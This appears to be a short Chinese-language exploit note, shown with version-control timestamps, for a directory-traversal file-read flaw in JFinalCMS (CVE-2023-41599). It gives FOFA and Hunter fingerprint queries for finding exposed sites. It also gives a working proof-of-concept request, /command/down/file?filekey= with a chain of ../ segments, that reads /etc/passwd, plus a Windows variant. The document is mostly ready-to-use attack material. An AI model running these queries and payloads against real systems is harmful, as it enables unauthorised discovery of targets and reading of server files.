2023-09-20 17:48:03 +08:00
|
|
|
## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 特征
|
2023-09-20 17:48:37 +08:00
|
|
|
```
|
|
|
|
|
fofa:
|
2023-09-20 17:48:03 +08:00
|
|
|
body="content=\"JreCms"
|
|
|
|
|
|
|
|
|
|
hunter:
|
|
|
|
|
web.body="content=\"JreCms"
|
|
|
|
|
```
|
|
|
|
|
## POC
|
|
|
|
|
```
|
|
|
|
|
Windows: /../../../../../../../../../test.txt
|
|
|
|
|
Linux: /../../../../../../../../../etc/passwd
|
|
|
|
|
|
|
|
|
|
/command/down/file?filekey=/../../../../../../../../../etc/passwd
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞分析
|
|
|
|
|
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
|
